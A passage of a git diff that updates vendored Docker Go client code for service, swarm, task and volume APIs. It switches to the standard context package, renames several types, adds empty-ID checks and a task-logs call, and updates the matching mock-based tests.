+		if options.QueryRegistry {
+			var img string
+			img, imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.ContainerSpec.Image, options.EncodedRegistryAuth)
+			if img != "" {
+				service.TaskTemplate.ContainerSpec.Image = img
+			}
+		}
+	}
+
+	// ensure that the image is tagged
+	if service.TaskTemplate.PluginSpec != nil {
+		if taggedImg := imageWithTagString(service.TaskTemplate.PluginSpec.Remote); taggedImg != "" {
+			service.TaskTemplate.PluginSpec.Remote = taggedImg
+		}
+		if options.QueryRegistry {
+			var img string
+			img, imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.PluginSpec.Remote, options.EncodedRegistryAuth)
+			if img != "" {
+				service.TaskTemplate.PluginSpec.Remote = img
+			}
+		}
+	}
+
+	if service.TaskTemplate.Placement == nil && len(imgPlatforms) > 0 {
+		service.TaskTemplate.Placement = &swarm.Placement{}
+	}
+	if len(imgPlatforms) > 0 {
+		service.TaskTemplate.Placement.Platforms = imgPlatforms
+	}
+
 	var response types.ServiceUpdateResponse
 	resp, err := cli.post(ctx, "/services/"+serviceID+"/update", query, service, headers)
 	if err != nil {
@@ -36,6 +82,11 @@ func (cli *Client) ServiceUpdate(ctx context.Context, serviceID string, version
 	}
 
 	err = json.NewDecoder(resp.body).Decode(&response)
+
+	if distErr != nil {
+		response.Warnings = append(response.Warnings, digestWarning(service.TaskTemplate.ContainerSpec.Image))
+	}
+
 	ensureReaderClosed(resp)
 	return response, err
 }
diff --git a/vendor/github.com/docker/docker/client/service_update_test.go b/vendor/github.com/docker/docker/client/service_update_test.go
index 76bea176bf..9a0a9ce0dd 100644
--- a/vendor/github.com/docker/docker/client/service_update_test.go
+++ b/vendor/github.com/docker/docker/client/service_update_test.go
@@ -1,15 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/swarm"
 )
diff --git a/vendor/github.com/docker/docker/client/session.go b/vendor/github.com/docker/docker/client/session.go
new file mode 100644
index 0000000000..c247123b45
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/session.go
@@ -0,0 +1,18 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"context"
+	"net"
+	"net/http"
+)
+
+// DialSession returns a connection that can be used communication with daemon
+func (cli *Client) DialSession(ctx context.Context, proto string, meta map[string][]string) (net.Conn, error) {
+	req, err := http.NewRequest("POST", "/session", nil)
+	if err != nil {
+		return nil, err
+	}
+	req = cli.addHeaders(req, meta)
+
+	return cli.setupHijackConn(req, proto)
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go
index be28d32628..0c50c01a8c 100644
--- a/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go
+++ b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // SwarmGetUnlockKey retrieves the swarm's unlock key.
diff --git a/vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go b/vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go
new file mode 100644
index 0000000000..a1e460c1dc
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go
@@ -0,0 +1,59 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestSwarmGetUnlockKeyError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.SwarmGetUnlockKey(context.Background())
+	assert.Check(t, is.ErrorContains(err, "Error response from daemon: Server error"))
+}
+
+func TestSwarmGetUnlockKey(t *testing.T) {
+	expectedURL := "/swarm/unlockkey"
+	unlockKey := "SWMKEY-1-y6guTZNTwpQeTL5RhUfOsdBdXoQjiB2GADHSRJvbXeE"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "GET" {
+				return nil, fmt.Errorf("expected GET method, got %s", req.Method)
+			}
+
+			key := types.SwarmUnlockKeyResponse{
+				UnlockKey: unlockKey,
+			}
+
+			b, err := json.Marshal(key)
+			if err != nil {
+				return nil, err
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	resp, err := client.SwarmGetUnlockKey(context.Background())
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(unlockKey, resp.UnlockKey))
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_init.go b/vendor/github.com/docker/docker/client/swarm_init.go
index fd45d066e3..742ca0f041 100644
--- a/vendor/github.com/docker/docker/client/swarm_init.go
+++ b/vendor/github.com/docker/docker/client/swarm_init.go
@@ -1,13 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
-// SwarmInit initializes the Swarm.
+// SwarmInit initializes the swarm.
 func (cli *Client) SwarmInit(ctx context.Context, req swarm.InitRequest) (string, error) {
 	serverResp, err := cli.post(ctx, "/swarm/init", nil, req, nil)
 	if err != nil {
diff --git a/vendor/github.com/docker/docker/client/swarm_init_test.go b/vendor/github.com/docker/docker/client/swarm_init_test.go
index 811155aff4..1abadc75e9 100644
--- a/vendor/github.com/docker/docker/client/swarm_init_test.go
+++ b/vendor/github.com/docker/docker/client/swarm_init_test.go
@@ -1,15 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types/swarm"
 )
 
diff --git a/vendor/github.com/docker/docker/client/swarm_inspect.go b/vendor/github.com/docker/docker/client/swarm_inspect.go
index 6d95cfc05e..cfaabb25b1 100644
--- a/vendor/github.com/docker/docker/client/swarm_inspect.go
+++ b/vendor/github.com/docker/docker/client/swarm_inspect.go
@@ -1,13 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
-// SwarmInspect inspects the Swarm.
+// SwarmInspect inspects the swarm.
 func (cli *Client) SwarmInspect(ctx context.Context) (swarm.Swarm, error) {
 	serverResp, err := cli.get(ctx, "/swarm", nil, nil)
 	if err != nil {
diff --git a/vendor/github.com/docker/docker/client/swarm_inspect_test.go b/vendor/github.com/docker/docker/client/swarm_inspect_test.go
index 6432d172b4..954adc94c6 100644
--- a/vendor/github.com/docker/docker/client/swarm_inspect_test.go
+++ b/vendor/github.com/docker/docker/client/swarm_inspect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 func TestSwarmInspectError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/swarm_join.go b/vendor/github.com/docker/docker/client/swarm_join.go
index cda99930eb..a1cf0455d2 100644
--- a/vendor/github.com/docker/docker/client/swarm_join.go
+++ b/vendor/github.com/docker/docker/client/swarm_join.go
@@ -1,11 +1,12 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
+
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
-// SwarmJoin joins the Swarm.
+// SwarmJoin joins the swarm.
 func (cli *Client) SwarmJoin(ctx context.Context, req swarm.JoinRequest) error {
 	resp, err := cli.post(ctx, "/swarm/join", nil, req, nil)
 	ensureReaderClosed(resp)
diff --git a/vendor/github.com/docker/docker/client/swarm_join_test.go b/vendor/github.com/docker/docker/client/swarm_join_test.go
index 31ef2a76ee..e67f2bdecf 100644
--- a/vendor/github.com/docker/docker/client/swarm_join_test.go
+++ b/vendor/github.com/docker/docker/client/swarm_join_test.go
@@ -1,15 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types/swarm"
 )
 
diff --git a/vendor/github.com/docker/docker/client/swarm_leave.go b/vendor/github.com/docker/docker/client/swarm_leave.go
index a4df732174..90ca84b363 100644
--- a/vendor/github.com/docker/docker/client/swarm_leave.go
+++ b/vendor/github.com/docker/docker/client/swarm_leave.go
@@ -1,12 +1,11 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
-
-	"golang.org/x/net/context"
 )
 
-// SwarmLeave leaves the Swarm.
+// SwarmLeave leaves the swarm.
 func (cli *Client) SwarmLeave(ctx context.Context, force bool) error {
 	query := url.Values{}
 	if force {
diff --git a/vendor/github.com/docker/docker/client/swarm_leave_test.go b/vendor/github.com/docker/docker/client/swarm_leave_test.go
index c96dac8120..3dd3711d04 100644
--- a/vendor/github.com/docker/docker/client/swarm_leave_test.go
+++ b/vendor/github.com/docker/docker/client/swarm_leave_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestSwarmLeaveError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/swarm_unlock.go b/vendor/github.com/docker/docker/client/swarm_unlock.go
index addfb59f0a..d2412f7d44 100644
--- a/vendor/github.com/docker/docker/client/swarm_unlock.go
+++ b/vendor/github.com/docker/docker/client/swarm_unlock.go
@@ -1,17 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
+
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
-// SwarmUnlock unlockes locked swarm.
+// SwarmUnlock unlocks locked swarm.
 func (cli *Client) SwarmUnlock(ctx context.Context, req swarm.UnlockRequest) error {
 	serverResp, err := cli.post(ctx, "/swarm/unlock", nil, req, nil)
-	if err != nil {
-		return err
-	}
-
 	ensureReaderClosed(serverResp)
 	return err
 }
diff --git a/vendor/github.com/docker/docker/client/swarm_unlock_test.go b/vendor/github.com/docker/docker/client/swarm_unlock_test.go
new file mode 100644
index 0000000000..b3bcc5d922
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_unlock_test.go
@@ -0,0 +1,48 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/swarm"
+)
+
+func TestSwarmUnlockError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.SwarmUnlock(context.Background(), swarm.UnlockRequest{UnlockKey: "SWMKEY-1-y6guTZNTwpQeTL5RhUfOsdBdXoQjiB2GADHSRJvbXeU"})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestSwarmUnlock(t *testing.T) {
+	expectedURL := "/swarm/unlock"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.SwarmUnlock(context.Background(), swarm.UnlockRequest{UnlockKey: "SWMKEY-1-y6guTZNTwpQeTL5RhUfOsdBdXoQjiB2GADHSRJvbXeU"})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_update.go b/vendor/github.com/docker/docker/client/swarm_update.go
index cc8eeb6554..56a5bea761 100644
--- a/vendor/github.com/docker/docker/client/swarm_update.go
+++ b/vendor/github.com/docker/docker/client/swarm_update.go
@@ -1,15 +1,15 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"fmt"
 	"net/url"
 	"strconv"
 
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
-// SwarmUpdate updates the Swarm.
+// SwarmUpdate updates the swarm.
 func (cli *Client) SwarmUpdate(ctx context.Context, version swarm.Version, swarm swarm.Spec, flags swarm.UpdateFlags) error {
 	query := url.Values{}
 	query.Set("version", strconv.FormatUint(version.Index, 10))
diff --git a/vendor/github.com/docker/docker/client/swarm_update_test.go b/vendor/github.com/docker/docker/client/swarm_update_test.go
index 3b23db078f..e908bf7860 100644
--- a/vendor/github.com/docker/docker/client/swarm_update_test.go
+++ b/vendor/github.com/docker/docker/client/swarm_update_test.go
@@ -1,15 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types/swarm"
 )
 
diff --git a/vendor/github.com/docker/docker/client/task_inspect.go b/vendor/github.com/docker/docker/client/task_inspect.go
index bc8058fc32..e1c0a736da 100644
--- a/vendor/github.com/docker/docker/client/task_inspect.go
+++ b/vendor/github.com/docker/docker/client/task_inspect.go
@@ -1,24 +1,22 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"io/ioutil"
-	"net/http"
 
 	"github.com/docker/docker/api/types/swarm"
-
-	"golang.org/x/net/context"
 )
 
 // TaskInspectWithRaw returns the task information and its raw representation..
 func (cli *Client) TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error) {
+	if taskID == "" {
+		return swarm.Task{}, nil, objectNotFoundError{object: "task", id: taskID}
+	}
 	serverResp, err := cli.get(ctx, "/tasks/"+taskID, nil, nil)
 	if err != nil {
-		if serverResp.statusCode == http.StatusNotFound {
-			return swarm.Task{}, nil, taskNotFoundError{taskID}
-		}
-		return swarm.Task{}, nil, err
+		return swarm.Task{}, nil, wrapResponseError(err, serverResp, "task", taskID)
 	}
 	defer ensureReaderClosed(serverResp)
 
diff --git a/vendor/github.com/docker/docker/client/task_inspect_test.go b/vendor/github.com/docker/docker/client/task_inspect_test.go
index 148cdad3a7..fe5c5bd778 100644
--- a/vendor/github.com/docker/docker/client/task_inspect_test.go
+++ b/vendor/github.com/docker/docker/client/task_inspect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,7 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
 )
 
 func TestTaskInspectError(t *testing.T) {
@@ -24,6 +25,18 @@ func TestTaskInspectError(t *testing.T) {
 	}
 }
 
+func TestTaskInspectWithEmptyID(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, errors.New("should not make request")
+		}),
+	}
+	_, _, err := client.TaskInspectWithRaw(context.Background(), "")
+	if !IsErrNotFound(err) {
+		t.Fatalf("Expected NotFoundError, got %v", err)
+	}
+}
+
 func TestTaskInspect(t *testing.T) {
 	expectedURL := "/tasks/task_id"
 	client := &Client{
diff --git a/vendor/github.com/docker/docker/client/task_list.go b/vendor/github.com/docker/docker/client/task_list.go
index 66324da959..42d20c1b8d 100644
--- a/vendor/github.com/docker/docker/client/task_list.go
+++ b/vendor/github.com/docker/docker/client/task_list.go
@@ -1,13 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 // TaskList returns the list of tasks.
@@ -15,7 +15,7 @@ func (cli *Client) TaskList(ctx context.Context, options types.TaskListOptions)
 	query := url.Values{}
 
 	if options.Filters.Len() > 0 {
-		filterJSON, err := filters.ToParam(options.Filters)
+		filterJSON, err := filters.ToJSON(options.Filters)
 		if err != nil {
 			return nil, err
 		}
diff --git a/vendor/github.com/docker/docker/client/task_list_test.go b/vendor/github.com/docker/docker/client/task_list_test.go
index 2a9a4c4346..16d0edaa0a 100644
--- a/vendor/github.com/docker/docker/client/task_list_test.go
+++ b/vendor/github.com/docker/docker/client/task_list_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -12,7 +13,6 @@ import (
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 func TestTaskListError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/task_logs.go b/vendor/github.com/docker/docker/client/task_logs.go
new file mode 100644
index 0000000000..6222fab577
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/task_logs.go
@@ -0,0 +1,51 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"context"
+	"io"
+	"net/url"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	timetypes "github.com/docker/docker/api/types/time"
+)
+
+// TaskLogs returns the logs generated by a task in an io.ReadCloser.
+// It's up to the caller to close the stream.
+func (cli *Client) TaskLogs(ctx context.Context, taskID string, options types.ContainerLogsOptions) (io.ReadCloser, error) {
+	query := url.Values{}
+	if options.ShowStdout {
+		query.Set("stdout", "1")
+	}
+
+	if options.ShowStderr {
+		query.Set("stderr", "1")
+	}
+
+	if options.Since != "" {
+		ts, err := timetypes.GetTimestamp(options.Since, time.Now())
+		if err != nil {
+			return nil, err
+		}
+		query.Set("since", ts)
+	}
+
+	if options.Timestamps {
+		query.Set("timestamps", "1")
+	}
+
+	if options.Details {
+		query.Set("details", "1")
+	}
+
+	if options.Follow {
+		query.Set("follow", "1")
+	}
+	query.Set("tail", options.Tail)
+
+	resp, err := cli.get(ctx, "/tasks/"+taskID+"/logs", query, nil)
+	if err != nil {
+		return nil, err
+	}
+	return resp.body, nil
+}
diff --git a/vendor/github.com/docker/docker/client/transport.go b/vendor/github.com/docker/docker/client/transport.go
index f04e601649..5541344366 100644
--- a/vendor/github.com/docker/docker/client/transport.go
+++ b/vendor/github.com/docker/docker/client/transport.go
@@ -1,22 +1,11 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"crypto/tls"
-	"errors"
 	"net/http"
 )
 
-var errTLSConfigUnavailable = errors.New("TLSConfig unavailable")
-
-// transportFunc allows us to inject a mock transport for testing. We define it
-// here so we can detect the tlsconfig and return nil for only this type.
-type transportFunc func(*http.Request) (*http.Response, error)
-
-func (tf transportFunc) RoundTrip(req *http.Request) (*http.Response, error) {
-	return tf(req)
-}
-
-// resolveTLSConfig attempts to resolve the tls configuration from the
+// resolveTLSConfig attempts to resolve the TLS configuration from the
 // RoundTripper.
 func resolveTLSConfig(transport http.RoundTripper) *tls.Config {
 	switch tr := transport.(type) {
diff --git a/vendor/github.com/docker/docker/client/utils.go b/vendor/github.com/docker/docker/client/utils.go
index 23d520ecb8..7f3ff44eb8 100644
--- a/vendor/github.com/docker/docker/client/utils.go
+++ b/vendor/github.com/docker/docker/client/utils.go
@@ -1,9 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
-	"github.com/docker/docker/api/types/filters"
 	"net/url"
 	"regexp"
+
+	"github.com/docker/docker/api/types/filters"
 )
 
 var headerRegexp = regexp.MustCompile(`\ADocker/.+\s\((.+)\)\z`)
@@ -23,7 +24,7 @@ func getDockerOS(serverHeader string) string {
 func getFiltersQuery(f filters.Args) (url.Values, error) {
 	query := url.Values{}
 	if f.Len() > 0 {
-		filterJSON, err := filters.ToParam(f)
+		filterJSON, err := filters.ToJSON(f)
 		if err != nil {
 			return query, err
 		}
diff --git a/vendor/github.com/docker/docker/client/version.go b/vendor/github.com/docker/docker/client/version.go
index 933ceb4a49..1989f6d6d2 100644
--- a/vendor/github.com/docker/docker/client/version.go
+++ b/vendor/github.com/docker/docker/client/version.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // ServerVersion returns information of the docker client and server host.
diff --git a/vendor/github.com/docker/docker/client/volume_create.go b/vendor/github.com/docker/docker/client/volume_create.go
index 9620c87cbf..f1f6fcdc4a 100644
--- a/vendor/github.com/docker/docker/client/volume_create.go
+++ b/vendor/github.com/docker/docker/client/volume_create.go
@@ -1,15 +1,15 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 
 	"github.com/docker/docker/api/types"
 	volumetypes "github.com/docker/docker/api/types/volume"
-	"golang.org/x/net/context"
 )
 
 // VolumeCreate creates a volume in the docker host.
-func (cli *Client) VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error) {
+func (cli *Client) VolumeCreate(ctx context.Context, options volumetypes.VolumeCreateBody) (types.Volume, error) {
 	var volume types.Volume
 	resp, err := cli.post(ctx, "/volumes/create", nil, options, nil)
 	if err != nil {
diff --git a/vendor/github.com/docker/docker/client/volume_create_test.go b/vendor/github.com/docker/docker/client/volume_create_test.go
index 9f1b2540b5..cfab191845 100644
--- a/vendor/github.com/docker/docker/client/volume_create_test.go
+++ b/vendor/github.com/docker/docker/client/volume_create_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -11,7 +12,6 @@ import (
 
 	"github.com/docker/docker/api/types"
 	volumetypes "github.com/docker/docker/api/types/volume"
-	"golang.org/x/net/context"
 )
 
 func TestVolumeCreateError(t *testing.T) {
@@ -19,7 +19,7 @@ func TestVolumeCreateError(t *testing.T) {
 		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 
-	_, err := client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{})
+	_, err := client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{})
 	if err == nil || err.Error() != "Error response from daemon: Server error" {
 		t.Fatalf("expected a Server Error, got %v", err)
 	}
@@ -53,7 +53,7 @@ func TestVolumeCreate(t *testing.T) {
 		}),
 	}
 
-	volume, err := client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{
+	volume, err := client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{
 		Name:   "myvolume",
 		Driver: "mydriver",
 		DriverOpts: map[string]string{
diff --git a/vendor/github.com/docker/docker/client/volume_inspect.go b/vendor/github.com/docker/docker/client/volume_inspect.go
index 3860e9b22c..f840682d2e 100644
--- a/vendor/github.com/docker/docker/client/volume_inspect.go
+++ b/vendor/github.com/docker/docker/client/volume_inspect.go
@@ -1,13 +1,12 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"io/ioutil"
-	"net/http"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // VolumeInspect returns the information about a specific volume in the docker host.
@@ -18,13 +17,14 @@ func (cli *Client) VolumeInspect(ctx context.Context, volumeID string) (types.Vo
 
 // VolumeInspectWithRaw returns the information about a specific volume in the docker host and its raw representation
 func (cli *Client) VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error) {
+	if volumeID == "" {
+		return types.Volume{}, nil, objectNotFoundError{object: "volume", id: volumeID}
+	}
+
 	var volume types.Volume
 	resp, err := cli.get(ctx, "/volumes/"+volumeID, nil, nil)
 	if err != nil {
-		if resp.statusCode == http.StatusNotFound {
-			return volume, nil, volumeNotFoundError{volumeID}
-		}
-		return volume, nil, err
+		return volume, nil, wrapResponseError(err, resp, "volume", volumeID)
 	}
 	defer ensureReaderClosed(resp)
 
diff --git a/vendor/github.com/docker/docker/client/volume_inspect_test.go b/vendor/github.com/docker/docker/client/volume_inspect_test.go
index 0d1d118828..04f00129b7 100644
--- a/vendor/github.com/docker/docker/client/volume_inspect_test.go
+++ b/vendor/github.com/docker/docker/client/volume_inspect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,9 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestVolumeInspectError(t *testing.T) {
@@ -19,9 +22,7 @@ func TestVolumeInspectError(t *testing.T) {
 	}
 
 	_, err := client.VolumeInspect(context.Background(), "nothing")
-	if err == nil || err.Error() != "Error response from daemon: Server error" {
-		t.Fatalf("expected a Server Error, got %v", err)
-	}
+	assert.Check(t, is.ErrorContains(err, "Error response from daemon: Server error"))
 }
 
 func TestVolumeInspectNotFound(t *testing.T) {
@@ -30,13 +31,29 @@ func TestVolumeInspectNotFound(t *testing.T) {
 	}
 
 	_, err := client.VolumeInspect(context.Background(), "unknown")
-	if err == nil || !IsErrVolumeNotFound(err) {
-		t.Fatalf("expected a volumeNotFound error, got %v", err)
+	assert.Check(t, IsErrNotFound(err))
+}
+
+func TestVolumeInspectWithEmptyID(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, errors.New("should not make request")
+		}),
+	}
+	_, _, err := client.VolumeInspectWithRaw(context.Background(), "")
+	if !IsErrNotFound(err) {
+		t.Fatalf("Expected NotFoundError, got %v", err)
 	}
 }
 
 func TestVolumeInspect(t *testing.T) {
 	expectedURL := "/volumes/volume_id"
+	expected := types.Volume{
+		Name:       "name",
+		Driver:     "driver",
+		Mountpoint: "mountpoint",
+	}
+
 	client := &Client{
 		client: newMockClient(func(req *http.Request) (*http.Response, error) {
 			if !strings.HasPrefix(req.URL.Path, expectedURL) {
@@ -45,11 +62,7 @@ func TestVolumeInspect(t *testing.T) {
 			if req.Method != "GET" {
 				return nil, fmt.Errorf("expected GET method, got %s", req.Method)
 			}
-			content, err := json.Marshal(types.Volume{
-				Name:       "name",
-				Driver:     "driver",
-				Mountpoint: "mountpoint",
-			})
+			content, err := json.Marshal(expected)
 			if err != nil {
 				return nil, err
 			}
@@ -60,17 +73,7 @@ func TestVolumeInspect(t *testing.T) {
 		}),
 	}
 
-	v, err := client.VolumeInspect(context.Background(), "volume_id")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if v.Name != "name" {
-		t.Fatalf("expected `name`, got %s", v.Name)
-	}
-	if v.Driver != "driver" {
-		t.Fatalf("expected `driver`, got %s", v.Driver)
-	}
-	if v.Mountpoint != "mountpoint" {
-		t.Fatalf("expected `mountpoint`, got %s", v.Mountpoint)
-	}
+	volume, err := client.VolumeInspect(context.Background(), "volume_id")
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(expected, volume))
 }
diff --git a/vendor/github.com/docker/docker/client/volume_list.go b/vendor/github.com/docker/docker/client/volume_list.go
index 32247ce115..284554d67c 100644
--- a/vendor/github.com/docker/docker/client/volume_list.go
+++ b/vendor/github.com/docker/docker/client/volume_list.go
@@ -1,17 +1,17 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 
 	"github.com/docker/docker/api/types/filters"
 	volumetypes "github.com/docker/docker/api/types/volume"
-	"golang.org/x/net/context"
 )
 
 // VolumeList returns the volumes configured in the docker host.
-func (cli *Client) VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error) {
-	var volumes volumetypes.VolumesListOKBody
+func (cli *Client) VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumeListOKBody, error) {
+	var volumes volumetypes.VolumeListOKBody
 	query := url.Values{}
 
 	if filter.Len() > 0 {
diff --git a/vendor/github.com/docker/docker/client/volume_list_test.go b/vendor/github.com/docker/docker/client/volume_list_test.go
index f29639be23..2a83823f7e 100644
--- a/vendor/github.com/docker/docker/client/volume_list_test.go
+++ b/vendor/github.com/docker/docker/client/volume_list_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
